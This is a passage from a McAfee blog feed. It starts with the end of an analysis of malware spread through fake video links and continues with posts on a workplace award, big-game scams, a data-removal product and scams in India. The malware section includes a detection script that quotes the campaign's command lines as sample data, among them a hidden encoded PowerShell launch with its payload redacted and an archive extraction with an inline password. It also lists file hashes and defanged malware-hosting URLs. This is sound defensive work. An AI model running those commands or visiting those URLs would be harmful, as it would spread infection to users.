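    Three relationships in the tree above are worth turning into detection logic: the MSI installer’s child UnRar.exe extracting an archive under AppData\Roaming with the password on the command line, a binary running from AppData\Roaming spawning explorer.exe, and that explorer.exe spawning a hidden, Base64-encoded PowerShell command. The following is an added example, not McAfee’s code, that evaluates those three parent/child rules over a process tree. The events are constructed from the command lines on this page: the PIDs and the username are invented, and the encoded PowerShell payload (which the page does not reproduce) is replaced by the placeholder <redacted>.

```python
"""Parent/child rules over a Windows process tree.

Added example, not McAfee's code. EVENTS is constructed from the command
lines on this page with invented PIDs and username.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    cmdline: str

    @property
    def image(self) -> str:
        """Executable name from the command line (quoted or not), path stripped."""
        if self.cmdline.startswith('"'):
            first = self.cmdline[1:].split('"', 1)[0]
        else:
            first = self.cmdline.split(None, 1)[0] if self.cmdline.strip() else ""
        return first.replace("/", "\\").rsplit("\\", 1)[-1].lower()


ARCHIVERS = {"unrar.exe", "rar.exe", "7z.exe", "7za.exe"}
ROAMING = re.compile(r"\\appdata\\roaming\\", re.I)
# -WindowStyle Hidden ... -e/-enc/-EncodedCommand <blob>
HIDDEN_ENCODED_PS = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b.*-e(?:n(?:c\w*)?|c)?\s+\S+", re.I | re.S)
POWERSHELL_IMAGES = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}


def ancestors(ev, by_pid):
    """Walk parent links upward; stops at unknown PIDs or loops."""
    chain, seen = [], set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def rule_msi_unpacks_password_archive(ev, by_pid):
    """An archiver run with an inline password (-p<pw>) somewhere under msiexec."""
    return (ev.image in ARCHIVERS
            and re.search(r"(?:^|\s)-p\S+", ev.cmdline) is not None
            and any(a.image == "msiexec.exe" for a in ancestors(ev, by_pid)))


def rule_roaming_binary_spawns_explorer(ev, by_pid):
    """explorer.exe whose parent runs out of a user-writable Roaming folder."""
    parent = by_pid.get(ev.ppid)
    return ev.image == "explorer.exe" and parent is not None and ROAMING.search(parent.cmdline) is not None


def rule_explorer_spawns_encoded_powershell(ev, by_pid):
    """Hidden, encoded PowerShell launched by explorer.exe."""
    parent = by_pid.get(ev.ppid)
    return (ev.image in POWERSHELL_IMAGES and parent is not None
            and parent.image == "explorer.exe"
            and HIDDEN_ENCODED_PS.search(ev.cmdline) is not None)


RULES = {
    "msi_unpacks_password_archive": rule_msi_unpacks_password_archive,
    "roaming_binary_spawns_explorer": rule_roaming_binary_spawns_explorer,
    "explorer_spawns_encoded_powershell": rule_explorer_spawns_encoded_powershell,
}


def analyze_tree(events):
    """Return (rule name, pid, image) for every event that trips a rule."""
    by_pid = {e.pid: e for e in events}
    return [(name, e.pid, e.image)
            for e in events for name, rule in RULES.items() if rule(e, by_pid)]


# Constructed sample mirroring the process tree above (PIDs and user invented).
APP_DIR = r"C:\Users\user\AppData\Roaming\Toiap Corp Solus\Kowi SApp"
EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\system32\msiexec.exe /V"),
    ProcEvent(101, 100, r"C:\Windows\syswow64\MsiExec.exe -Embedding B8B3D9D8EE75B04B6E518D4C8B1DA31A"),
    ProcEvent(102, 101, f'"{APP_DIR}\\UnRar.exe" x -p156427613t -o+ "{APP_DIR}\\iwhgjds.rar" "{APP_DIR}\\"'),
    ProcEvent(103, 1, f'"{APP_DIR}\\obs-ffmpeg-mux.exe"'),
    ProcEvent(104, 103, r"C:\Windows\SysWOW64\explorer.exe explorer.exe"),
    ProcEvent(105, 104, "powershell -windowstyle hidden -e <redacted>"),
    ProcEvent(106, 105, r"C:\Windows\system32\WerFault.exe -u -p 105 -s 316"),
    ProcEvent(107, 1, r"C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc"),
]

if __name__ == "__main__":
    for name, pid, image in analyze_tree(EVENTS):
        print(f"{name}: pid={pid} image={image}")
```

    Note that the inline password in the UnRar.exe command line (-p156427613t) is a gift to the responder: it is the same password that unlocks the dropped .rar for offline analysis, and it is recorded in any process-creation telemetry (Sysmon Event ID 1, Windows Security 4688 with command-line auditing on). The WerFault.exe children in the tree are crash reports, not malicious activity, and the rules above ignore them.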

     

    Detection & Coverage 

    McAfee intercepts and blocks this infection chain at multiple stages. 

    URL blocking of the fake video pages. 

    Figure 13: McAfee Blocking URL 

     

    Figure 14: McAfee PDF file Detection 

     

    Conclusion and Recommendations 

    This campaign highlights how cybercriminals exploit social engineering tactics and clickbait content to distribute malware. Users should remain cautious when encountering suspicious video links. To stay protected against phishing attacks and malware infections, McAfee recommends: 

    1. Avoid clicking on suspicious links in emails, social media posts, or messages that promise exclusive or leaked content. 
    2. Verify file sources before downloading by checking domain legitimacy and scanning files with McAfee security solutions. 
    3. Enable real-time security updates to ensure endpoint protection remains updated against the latest threats. 
    4. Utilize McAfee Web Protection to block access to known phishing and malware-hosting websites. 

     

    Indicators of Compromise (IoCs) 

    SHA256 Hash List 

    • 00001c98e08fa4d7f4924bd1c375149104bd4f1981cef604755d34ca225f2ce1 
    • 000e75287631a93264d11fc2b773c61992664277386f45fa19897a095e6a7c81 
    • 52c606609dab25cdd43f831140d7f296d89f9f979e00918f712018e8cc1b6750 
    • 00539e997eb6ae5f6f7cb050c3486a6dfb901b1268c13bdfeeec5b776bf81c1e 
    • 0047d7a61fd9279c9fba9a604ed892e4ec9d732b10c6562aab1938486a538b7d 

     

    Redirecting Websites 

    • hxxps[:]//gitb.org/watch-click/?=archive 
    • hxxps[:]//viralxgo.com/watch-full-video/
    • hxxps[:]//purecopperapp.monster/indexind.php?flow_id=107&aff_click_id=D-21356743-1737975550-34G123G137G124-AITLS2195&keyword=Yourfile&ip=115.118.240.109&sub=22697121&source=157764 
    • hxxps[:]//wlanpremiumapp.monster/indexind.php?flow_id=107&aff_click_id=D-21356743-1739353595-34G134G64G208-YBUVA1634&keyword=Yourfile&ip=115.118.240.109&sub=22697095&source=157764 
    • hxxps[:]//savetitaniumapp.monster/?t=d6ebff4d554677320244f60589926b97 
    • hxxps[:]//loadpremiumapp.monster/?t=74fddba44e47538821a2796e12191868 
    • hxxps[:]//mega.nz/file/JG9nHAjQ#xYoJHxAy_mP1KlZC-m2P-UgPzXiHiH6XA0QQn62sseY 

     

    The post The Dark Side of Clickbait: How Fake Video Links Deliver Malware appeared first on McAfee Blog.

    McAfee Named One of America’s Best Employers by Forbes

    By: McAfee

    We’re thrilled to share some exciting news—McAfee has been recognized on Forbes’ prestigious list of America’s Best Midsize Employers for 2025! This recognition is a testament to our incredible employees, whose passion and commitment make McAfee not just an industry leader, but also a truly exceptional place to work. 

    “A great workplace isn’t just about what we do—it’s about who we are and the purpose we share,” said Justin Hastings, Chief People Officer at McAfee. “This award reflects our dedication to fostering an environment where employees feel valued, empowered, and connected. Whether through our innovation, career development, or our strong sense of community, we strive to make McAfee a place where talent thrives, driven by our mission to keep our customers safe in their digital lives.”

    Forbes and Statista, a global data and business intelligence firm, compiled this list based on feedback from over 217,000 employees across various industries in the U.S. The ranking considers both direct feedback from McAfee team members and public perceptions of our workplace culture, with personal employee experiences carrying the most weight. 

    What This Means for McAfee 

    At McAfee, we believe that a great workplace isn’t just about the work—it’s about the people. This recognition underscores our ongoing commitment to fostering a culture where employees feel valued, empowered, and inspired. Whether it’s through innovative projects, professional growth opportunities, or a strong sense of community, we strive to make McAfee a place where talent thrives. 

    Our spot within the top 300 of the 500 companies listed shows that our collective dedication to excellence, inclusivity, and collaboration is making an impact. 

    A Big Thank You to Our Team 

    This achievement wouldn’t be possible without our amazing employees who bring their best every day. Your contributions drive our success, and this recognition is as much yours as it is McAfee’s. 

    As we continue to push boundaries in cybersecurity, we remain committed to ensuring McAfee is a company where talent grows, ideas flourish, and people love coming to work. 

    Join us at McAfee   

    It’s an exciting time to be part of Team McAfee! As we continue to grow and innovate, we’re always looking for passionate individuals who want to help create a safer online world.  

    If you’re looking for a workplace where your ideas matter, your contributions are valued, and you can thrive in a dynamic, mission-driven environment, we’d love to have you on board. Explore opportunities to join us today!  

    The post McAfee Named One of America’s Best Employers by Forbes appeared first on McAfee Blog.

    Super Scams – Beat the Online Scammers Who Want to Sack Your Big Game

    By: McAfee

    Cybercriminals will always try to cash in on a good thing, and football is no exception. Online scammers are ramping up for the big game with all types of schemes designed to rip you off and steal your personal info—but you have several ways you can beat them at their game.  

    Like shopping holidays, tax season, and even back-to-school time, scammers take advantage of annual events that get people searching for deals and information online. You can include big games and tournaments in that list too. 

    Specific to this big game, you can count on several types of scams to rear their heads this time of year—ticket scams, merchandise scams, betting scams, and phony sweepstakes as well. They’re all in the mix, and they’re all avoidable. Here, we’ll break them down. 

    Keep an eye out for ticket scams. 

    As of two weeks out, tickets for the big game on the official ticketing website were going for $6,000 or so, and that was for the so-called “cheap seats.” Premium seats in the lower bowl 50-yard line, sold by verified resellers, were listed at $20,000 a pop or higher.  

    While the game tickets are now 100% mobile, that hasn’t prevented scammers from trying to pass off phony tickets as the real deal. They’ll hawk those counterfeits in plenty of places online, sometimes on sites like your friendly neighborhood Craigslist.  

    So if you’re in the market for tickets, there are certainly a few things to look out for: 

    • First off, the safest bet is to purchase tickets through the official marketplaces of the NFL with a 100% ticket guarantee. 
    • If someone is selling physical tickets, it’s a scam. As mentioned above, tickets are now 100% mobile. 
    • If you see so-called deals for tickets that are going well below the current rate, you can practically bet that’s a scam as well. 
    • Another sign of a scam is someone asking for payment through a payment app like Venmo, by wire transfer, or even in crypto. These payment methods work like cash: if you pay a scammer with them, your money is as good as gone.  

    Look out for online merch scams. 

    If you plan on enjoying the game closer to home, you may be in the market for some merch—a hat, a jersey, a tee, or maybe some new mugs for entertaining when you host the game at your place. With all the hype around the game, out will come scammers who set up bogus online stores. They’ll advertise items for sale but won’t deliver—leaving you a few dollars lighter and the scammers with your payment information, which they can use on their own for identity fraud. 

    You can shop safely with a few straightforward steps: 

    Stick with known, legitimate retailers online for your merch. 

    This is a great one to start with. Directly typing in the correct address for reputable online stores and retailers is a prime way to avoid scammers online. In the case of retailers that you don’t know much about, the U.S. Better Business Bureau (BBB) asks shoppers to do their research and make sure that retailer has a good reputation. The BBB makes that easier with a listing of retailers you can search simply by typing in their name. 

    If you feel like doing extra sleuthing, look up the address of the website and see when it was launched. A visit to the Internet Corporation for Assigned Names and Numbers (ICANN) at ICANN.org gives you the option to search a web address and see when it was launched, along with other information about who registered it. While a recently launched site is not an indicator of a scam site alone, sites with limited track records may give you pause if you want to shop there—particularly if there’s a chance it was just propped up by a scammer.  

    Look for the lock icon in your browser when you shop. 

    Secure websites begin their address with “https,” not just “http.” That extra “s” stands for “secure,” which means the site uses a secure protocol for transmitting sensitive info like passwords, credit card numbers, and the like over the internet. It often appears as a little padlock icon in the address bar of your browser, so double-check for that. If you don’t see that it’s secure, it’s best to avoid making purchases on that website. 

    Use a secure payment method other than your debit card. 

    Credit cards are a good way to go. One reason why is the Fair Credit Billing Act, which offers protection against fraudulent charges on credit cards by giving you the right to dispute charges over $50 for goods and services that were never delivered or otherwise billed incorrectly. Your credit card companies may have their own policies that improve upon the Fair Credit Billing Act as well. Debit cards don’t get the same protection under the Act.  

    Get online protection. 

    Comprehensive online protection software will defend against the latest virus, malware, spyware, and ransomware attacks plus further protect your privacy and identity. In addition to this, it can also provide strong password protection by generating and automatically storing complex passwords to keep your credentials safer from hackers and crooks who may try to force their way into your accounts. And, specific to the scams floating around this time of year, online protection can help prevent you from clicking links to known or suspected malicious sites. 

    Placing a bet? Make it a safe(r) one. 

    It’s hard to watch sports these days without odds and stat lines popping up onto the screen, along with a fair share of ads that promote online betting. If you’re thinking about making things interesting with some betting, keep a few things in mind: 

    • As of January 2023, online betting is live and legal in some form across 32 states in the U.S., with “live and legal” meaning that sports betting is legally offered through retail and/or online sportsbooks. Where you can bet and how you can bet varies from state to state, and this interactive map can show you the details for yours. 
    • Stick with the legal mobile betting apps and sites in your state, which you can also view via the interactive map linked above. Yet it shouldn’t come as a surprise that scam betting sites have cropped up. The Better Business Bureau (BBB) says it has received plenty of complaints: “You place a bet, and, at first, everything seems normal. But as soon as you try to cash out your winnings, you find you can’t withdraw a cent. Scammers will make up various excuses.” 
    • Also, read the fine print on those promo offers that betting sites and apps advertise. Chances are you’ve seen the commercials with all manner of special sign-up bonuses. The BBB advises people to closely read the terms and conditions behind those offers. For one, “Gambling companies can restrict a user’s activity,” meaning that they can freeze accounts and the funds associated with them based on their terms and conditions. Also, the BBB cautions people about those promo offers that are often heavily advertised, “[L]ike any sales pitch, these can be deceptive. Be sure to read the fine print carefully.”  
    • In addition to choosing a state-approved option, check out the organization’s BBB listing at BBB.org. Here you can get a snapshot of their BBB rating, complaints registered against them, and the organization’s response to those complaints if they have chosen to respond. Doing a little reading here can be enlightening. It can show you what complaints typically arise, and how the organization has historically addressed them. 

    Watch out for phony sweepstakes and prizes too. 

    As every year, you’ll see all kinds of sweepstakes and giveaways leading up to the game, plenty of them legitimate. Yet as they do, scammers will try to blend in by rolling out their own bogus promotions. Their aim: to part you from your cash or even your personal information. 

    A quick way to sniff out these scams is to take a close look at the promotion. For example, if it asks you to provide your bank information to send you your prize money, count on it being a scam. Likewise, if the promotion asks you to pay to claim a prize in some form or other, it’s also likely someone’s trying to scam you.  

    In all, steer clear of promotions that ask for something in return, particularly if it’s your money or personal information. 

    Enjoy your big game. 

    As has become the norm of late, all kinds of scams will try to glom onto the big game this year. And some of the best advice for avoiding them is not to give in to the hype. Scammers prey on scarcity, a sense of urgency, and keyed-up emotions in general. Their hope is that these things make you less critical and more likely to overlook things that would otherwise seem sketchy or too good to be true. Staying focused as you shop, place a wager, or otherwise look to round out your enjoyment of the big game is one of your best defenses against scammers right now, and any time. 

    The post Super Scams – Beat the Online Scammers Who Want to Sack Your Big Game appeared first on McAfee Blog.

    Introducing Personal Data Cleanup

    By: McAfee

    We’re excited to announce the release of McAfee’s Personal Data Cleanup, a new feature that finds and removes your personal info from data brokers and people search sites. Now, you can feel more confident by removing personal info from data broker sites and keeping it from being collected, sold, and used to advertise products to you, fill your email box with spam, or even give criminals the info they need to steal your identity. Let’s look at why we’re offering McAfee Personal Data Cleanup, how it protects your privacy, and why it’s a great addition to the online protection we already offer. 

    Does the cost of a connected life have to be your privacy?

    There’s so much to enjoy when you live a connected life – free email, online stores that remember what you like, social media that connects you to friends and influencers. It’s a world of convenience, opportunity, and incredible content. It’s also a world where your data is constantly collected.  

    “Wait. Did you say my data?” 

    That’s right, companies are collecting your personal data. They’re called data brokers, and they make money by selling information that specifically identifies you, like an email address. They sell this information to marketers looking to target you with ads. Criminals can also use it to build profiles in service of stealing your identity and accessing your accounts. This activity takes place behind the scenes and often without consumers’ knowledge. There are also data brokers known as people search sites that compile and sell info like home addresses, emails, phone numbers, court records, employment info, and more. These websites give identity thieves, hackers, stalkers, and other malicious actors easy access to your info. Regardless of how your data is being used, it’s clear that these days a more connected life often comes at the cost of your privacy.  

    Consumers are clamoring for more privacy online 

    In a recent survey of McAfee customers, we found that 59% have become more protective of their personal data over the past six months. And it’s no wonder. Over the past two years, trends like telehealth, remote working, and increased usage of online shopping and financial services have meant that more of your time is being spent online. Unsurprisingly, more personal data is being made available in the process. This leads us to the most alarming finding of our survey – 95% of consumers whose personal information ends up on data broker sites had it collected without their consent.  

     

    Free to enjoy privacy online with McAfee’s Personal Data Cleanup 

    We created Personal Data Cleanup to make it easy for you to take back your privacy online. McAfee’s Personal Data Cleanup regularly scans the riskiest data broker sites for info like your home address, date of birth, and names of relatives. After showing where we found your data, you can either remove it yourself or we will work on your behalf to remove it. Here’s how it works: 

    • Set up: 
      • Input your name, date of birth, and home address. 
    • Scan: 
      • We scan this against some of the riskiest data broker sites. 
    • Review: 
      • Within minutes, we’ll show you where we found your personal info, and what info the sites have. 
    • Remove: 
      • You can manually go to each site and request that your data be removed, OR upgrade to have McAfee manage the removal process on your behalf. 
    • Ongoing: 
      • Your info can reappear as data brokers continually collect data. To ensure ongoing protection, Personal Data Cleanup enables regular scanning so it can be removed. 

    Start using McAfee’s Personal Data Cleanup right now 

    Ready to take back your personal info online? Personal Data Cleanup is available immediately with most of our online protection plans. If you have an eligible subscription, you can start using this new feature through McAfee Protection Center, or you can get McAfee online protection here.

    The post Introducing Personal Data Cleanup appeared first on McAfee Blog.

    Rising Scams in India: Building Awareness and Prevention

    Authored by Anuradha, Sakshi Jaiswal 

    In 2024, scams in India have continued to evolve, leveraging sophisticated methods and technology to exploit unsuspecting individuals. These fraudulent activities target people across demographics, causing financial losses and emotional distress. This blog highlights some of the most prevalent scams this year, how they operate, some real-world scenarios, tips to stay vigilant, and what steps to take if you become a victim.

    This blog covers the following scams:

    1. WhatsApp Scam
    2. Instant Loan Scam
    3. Voice Cloning Scam
    4. Credit Card Scam
    5. Fake Delivery Scam
    6. Digital Arrest Scam

    1. WhatsApp Scam:

    Scam Tactics:

    Fraudsters on WhatsApp employ deceptive tactics to steal personal information, financial data, or gain unauthorized access to accounts. Common tactics include:

    • Phishing Links: Messages with fake links mimicking trusted organizations, urging users to verify their accounts or claim rewards.
      Example: “Your account will be deactivated! Click here to verify your number now.”

    Case 1: In the figure below, a user is being deceived by a message originating from the +244 country code, assigned to Angola. The message offers an unrealistic investment opportunity promising a high return in just four days, which is a common scam tactic. It uses pressure and informal language, along with a link for immediate action.

     

    Case 2: In the figure below, a user is being deceived by a message originating from the +261 country code, assigned to Madagascar. The message claims that you have been hired and asks you to click a link to view the offer or contact the sender, which is a scam.

    • Impersonation: Scammers hijack or mimic contacts to ask for urgent financial help.
      Example: “Hey, it’s me! I lost my wallet. Can you send me ₹5,000?”
    • Fake Job Offers: Messages promising high earnings from home to lure victims into scams.
      Example: “Earn ₹10,000 daily! Contact us to start now!”

    Case 3: In the figure below, a user is being deceived by a message originating from the +91 country code, assigned to India. Scammers may contact you, posing as representatives of a legitimate company, offering a job opportunity. The recruiter offers an unrealistic daily income (INR 2000–8000) for vague tasks like searching keywords, which is suspicious. Despite requests, they fail to provide official company details or an email ID, raising credibility concerns. They also ask for personal information prematurely, a common red flag.

    Case 4: In the figure below, a user is being deceived by a message originating from the +84 country code, assigned to Vietnam. The offer to earn money by watching a video for just a few seconds and providing a screenshot is a common tactic used by scammers to exploit individuals. They may use the link to gather personal information, or your action could lead to phishing attempts.

    Case 5: In the figure below, a user is being misled by a message originating from the country codes +91, +963, and +27, corresponding to India, Syria, and South Africa, respectively. The message claims to offer a part-time job with a high salary for minimal work, which is a common tactic used by scammers to lure individuals. The use of popular names like “Amazon” and promises of easy money are red flags. The link provided might lead to phishing attempts or data theft. It’s important not to click on any links, share personal details, or respond to such unsolicited offers.

    Case 6: The messages encourage you to post fake 5-star reviews for businesses in exchange for a small payment, which is unethical and often illegal. Scammers use such tactics to manipulate online ratings, and the provided links could lead to phishing sites or malware. Avoid engaging with these messages, clicking on the links, or participating in such activities.

     

    • Lottery/Giveaway Fraud: Claims of winning a prize, requiring advance payments or sharing bank details.
      Example: “Congrats! You’ve won ₹1,00,000 in the WhatsApp Lottery. Share your bank details to claim.”
    • Malware Links: Messages containing harmful links disguised as videos, photos, or documents, designed to infect your device.
      Example: “Look at this amazing video! [malicious link]”
    • Wedding Invite Scam: Fraudsters send fake wedding invitations with malicious links. Clicking the links can download an .apk file and install malware, steal personal or financial information, or gain unauthorized access to a WhatsApp account. Always verify the sender and avoid clicking suspicious links.
    • Verification Code Theft: Fraudsters trick users into sharing their WhatsApp verification codes, enabling account hijacking.

    How to Identify WhatsApp Scams:

    • Unsolicited Messages: Be cautious of unexpected messages, especially from unknown numbers.
    • Sense of Urgency: Scammers often create panic, pressuring you to act quickly.
    • Poor Language: Messages may contain spelling or grammatical errors, indicating they are not from legitimate sources.
    • Generic Greetings: Messages lack personalization, such as using “Dear Customer” instead of your name.
    • Too Good to Be True Offers: High-value rewards, jobs, or opportunities with no clear justification.
    • Suspicious Links: Shortened or unrecognizable URLs that redirect to fake websites.
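    The red flags above can be turned into a simple message triage rule set. The following Python script is an added example, not McAfee’s code or a McAfee detection model; the regexes, weights, threshold, placeholder sender numbers and benign control messages are all constructed for illustration, and the scam sample texts reuse the example messages quoted in this post.

```python
import re
from dataclasses import dataclass
from typing import FrozenSet, List, Tuple

# Added example: each regex is a machine-readable form of one red flag from the
# "How to Identify WhatsApp Scams" list. Patterns, weights and threshold are
# assumptions made for this illustration, not a McAfee detection model.
URGENCY = re.compile(
    r"\b(?:now|immediately|urgent(?:ly)?|act fast|"
    r"will be (?:deactivated|suspended|blocked))\b", re.I)
GENERIC_GREETING = re.compile(
    r"^\s*dear\s+(?:customer|user|member|sir|madam|sir/madam)\b", re.I)
TOO_GOOD = re.compile(
    r"\b(?:won|winner|lottery|prize|earn|daily|guaranteed|reward|giveaway|free)\b", re.I)
MONEY = re.compile(r"(?:₹|\brs\.?|\binr)\s?\d[\d,]*", re.I)
REQUEST = re.compile(r"\b(?:send|transfer|pay|share)\b", re.I)
SENSITIVE = re.compile(
    r"\b(?:bank details|account details|otp|verification code|pin|password|"
    r"aadhaar|cvv|card number)\b", re.I)
# Captures the host part of a bare or schemed URL, e.g. "bit.ly/abc" -> "bit.ly".
DOMAIN = re.compile(r"\b(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(?:/\S*)?", re.I)
# Shorteners hide the real destination; a short list is enough to show the idea.
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "cutt.ly", "is.gd", "rb.gy"}

WEIGHTS = {
    "unsolicited_sender": 1,       # an unknown number alone is weak evidence
    "urgency": 2,
    "generic_greeting": 1,
    "too_good_to_be_true": 2,
    "money_request": 2,
    "asks_for_sensitive_data": 3,  # no legitimate contact needs your OTP or PIN
    "shortened_url": 2,
    "contains_link": 1,
}
SUSPICIOUS_THRESHOLD = 3


@dataclass
class Verdict:
    sender: str
    hits: List[str]
    score: int
    suspicious: bool


def score_message(sender: str, text: str,
                  known_contacts: FrozenSet[str] = frozenset()) -> Verdict:
    """Match one message against the red-flag list and weigh the hits."""
    hits: List[str] = []
    if sender not in known_contacts:
        hits.append("unsolicited_sender")
    if URGENCY.search(text):
        hits.append("urgency")
    if GENERIC_GREETING.search(text):
        hits.append("generic_greeting")
    has_money = MONEY.search(text) is not None
    if has_money and TOO_GOOD.search(text):
        hits.append("too_good_to_be_true")   # prize or earnings tied to a rupee amount
    if has_money and REQUEST.search(text):
        hits.append("money_request")         # "send me ₹5,000" style asks
    if SENSITIVE.search(text):
        hits.append("asks_for_sensitive_data")
    domains = [m.group(1).lower() for m in DOMAIN.finditer(text)]
    if any(d in SHORTENERS for d in domains):
        hits.append("shortened_url")
    elif domains:
        hits.append("contains_link")
    score = sum(WEIGHTS[h] for h in hits)
    return Verdict(sender, hits, score, score >= SUSPICIOUS_THRESHOLD)


# Constructed samples: sender numbers are placeholders; the scam texts reuse the
# example messages quoted in this post, followed by two benign controls.
KNOWN_CONTACTS = frozenset({"+91 000 0001"})
SAMPLES: List[Tuple[str, str]] = [
    ("+244 000 0002", "Your account will be deactivated! Click here to verify "
                      "your number now. bit.ly/verify-now"),
    ("+91 000 0003", "Hey, it's me! I lost my wallet. Can you send me ₹5,000?"),
    ("+261 000 0004", "Earn ₹10,000 daily! Contact us to start now!"),
    ("+27 000 0005", "Congrats! You've won ₹1,00,000 in the WhatsApp Lottery. "
                     "Share your bank details to claim."),
    ("+91 000 0001", "Hi Priya, are we still on for lunch at 1 tomorrow?"),
    ("+91 000 0006", "Hello, this is the clinic confirming your appointment "
                     "on Monday at 10 am."),
]


def triage(samples=SAMPLES, known_contacts=KNOWN_CONTACTS) -> List[Verdict]:
    """Score every sample; the four scam texts cross the threshold, the controls do not."""
    return [score_message(s, t, known_contacts) for s, t in samples]


if __name__ == "__main__":
    for v in triage():
        flag = "SUSPICIOUS" if v.suspicious else "ok"
        print(f"{v.sender:15} {flag:10} score={v.score} {v.hits}")
```

    A single hit such as an unknown sender stays below the threshold on purpose, since many legitimate messages (a clinic, a courier) arrive from unsaved numbers; it is the combination of flags that marks a message for a closer look.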

    Impact:

    • Financial Loss: Victims may transfer money or share bank details, resulting in unauthorized transactions.
    • Identity Theft: Personal information can be misused for fraudulent activities.
    • Account Hijacking: Losing access to your WhatsApp account if verification codes are shared.
    • Privacy Breach: Sensitive data from your chats or device can be exploited.
    • Emotional Distress: Scams can cause stress, anxiety, and a loss of trust in technology or personal relationships.

    Prevention:

    • Verify Sender Identity: Confirm any request for money or sensitive information directly with the person through alternate means.
    • Avoid Clicking on Links: Always verify the legitimacy of links before clicking.
    • Enable Two-Step Verification: Secure your WhatsApp account with a PIN for added protection.
    • Restrict Profile Access: Adjust privacy settings to limit who can view your profile photo, status, and other details.
    • Be Cautious of Urgent Requests: Fraudulent messages often pressure you to act immediately. Take a moment to evaluate.
    • Check Authenticity: Research offers or schemes mentioned in messages to ensure they are legitimate.
    • Report and Block: Use WhatsApp’s “Report” feature to flag suspicious contacts and block them.

    2. Instant Loan Scam:

    Scam Tactics:

    • Fake Loan Apps or Websites: Scammers create fake loan apps or websites that appear legitimate. They promise easy loans with minimal requirements and fast disbursements.
    • Personal Information Harvesting: To apply for these loans, victims are asked to provide sensitive personal information, such as bank details, Aadhaar numbers, and other financial information.
    • Advance Fee Demand: Once the application is submitted, the scammers claim that an advance fee, processing charge, or security deposit is required before the loan can be disbursed.
    • Excessive Interest Rates: If the loan is approved, it often comes with extraordinarily high interest rates or hidden charges, leading the borrower into a debt trap.
    • Threats and Harassment: If the victim is unable to repay the loan, scammers may use aggressive tactics, including blackmail, threats of legal action, or public humiliation to force repayment.

    How to Identify Instant Loan Scam:

    • Unsolicited Offers: Be wary of loan offers you receive unexpectedly via calls, emails, or ads.
    • Too Good to Be True: If the loan offer seems unusually easy, with little paperwork or no credit checks, it’s likely a scam.
    • Advance Fees: Genuine lenders never ask for upfront payments before disbursing a loan.
    • Excessive Interest Rates: Watch out for loans with outrageously high interest rates or hidden fees.
    • Unprofessional Communication: Look for red flags like poorly written messages or vague, generic offers.
    • Pressure to Act Fast: Scammers often create urgency, pushing you to make quick decisions without proper verification.

    Impact:

    • Financial Losses: Victims are often tricked into paying exorbitant fees, with no loan ever being disbursed, or receiving loans with unaffordable repayment terms.
    • Emotional Distress: The constant harassment, along with the fear of financial ruin, leads to significant emotional and mental stress for victims.

    Prevention:

    • Verify Loan Providers: Always check the legitimacy of loan apps or websites by reading reviews and verifying their authenticity through trusted sources.
    • Avoid Sharing Sensitive Information: Never share personal or financial information unless you’re sure of the legitimacy of the platform.
    • Report Suspicious Platforms: If you come across a suspicious loan provider, report it to relevant authorities like the Reserve Bank of India (RBI) or consumer protection agencies.
    • Be Cautious with Quick Loans: Instant loans with no credit checks or paperwork should raise immediate suspicion. Always read the terms and conditions carefully.

     

    3. Voice-Cloning Scam:

    Voice-cloning scams use advanced AI technology to replicate the voices of familiar people, such as friends, family members, or colleagues, to manipulate victims into transferring money or providing sensitive information.

    Scam Tactics:

    • Impersonating Trusted Voices: Scammers use voice-cloning technology to mimic the voice of a person the victim knows, often creating a sense of trust and urgency.
    • Urgent Requests for Money: The cloned voice typically claims an emergency, such as needing money for medical expenses or legal issues, pressuring the victim to act quickly.
    • Sensitive Information Requests: Scammers may also use voice cloning to trick victims into revealing personal information, passwords, or financial details.

    How to Identify AI Voice-Cloning Scams:

    • Verify the Country Code: Check the country code of the incoming call to ensure it matches the expected location.
    • Contact the Person Directly: If possible, reach out to the person through another method to confirm the authenticity of the call.
    • Notice Changes in Speech Tone or Patterns: Be alert to any changes in the speaker’s tone or unnatural speech patterns that may indicate a scam.

    Impact:

    • Financial Losses
    • Emotional and Psychological Stress

    Prevention

    • Verify the Caller: Always verify the caller’s identity through an alternative channel before proceeding with any action.
    • Be Skeptical of Urgency: Take your time and evaluate urgent requests carefully, especially those involving money.
    • Check the Country Code: Be cautious if the call comes from an unfamiliar country code.
    • Listen for Inconsistencies: Pay attention to unusual speech patterns or background noises.
    • Limit Information Sharing: Never share sensitive details over the phone unless you’re sure of the caller’s identity.
    • Use Multi-Factor Authentication: Add extra security to sensitive accounts with multi-factor authentication.
    • Stay Informed: Educate yourself and others, especially vulnerable individuals, about voice cloning scams.

     

    4. Credit Card Scam:

    Scam Tactics

    Scammers use various methods to deceive victims into revealing credit card information or making unauthorized payments:

    • Phishing: Fake emails, texts, or websites pretending to be from a legitimate entity (e.g., banks or online stores). Victims are tricked into providing card details or logging into a fake account portal.
    • Skimming: Devices installed on ATMs or payment terminals capture card information. Hidden cameras or fake keypads may record PINs.
    • Vishing (Phone Scams): Scammers impersonate bank representatives or government officials. They ask for credit card details, PINs, or OTPs to “resolve an issue.”
    • Fake Online Shopping Websites: Fraudulent e-commerce sites offer deals to steal card details during fake transactions.

    How to Identify Credit Card Scams:

    • Unsolicited Contact: Unexpected calls, emails, or messages asking for sensitive information.
    • Urgency: Claims of account suspension or fraudulent activity requiring immediate action.
    • Generic Greetings: Messages addressing you as “Dear Customer” or similar vague terms.
    • Suspicious Links: Links in emails or texts that lead to fake websites.
    • Unfamiliar Transactions: Small charges on your statement that you don’t recognize.

    Impact:

    • Loss of Money: Unauthorized purchases can drain your account.
    • Identity Theft: Scammers can misuse your personal details.
    • Credit Problems: Fraudulent charges could damage your credit score.
    • Stress: Victims often face anxiety and frustration.
    • Legal Issues: You may need to dispute fraudulent transactions.

    Prevention:

    • Don’t Share Card Details: Never share your card number, CVV, PIN, or OTP with anyone.
    • Shop on Secure Websites: Only enter card details on sites with “https://” and a padlock icon.
    • Avoid Suspicious Offers: Don’t click on links offering unbelievable discounts or rewards.
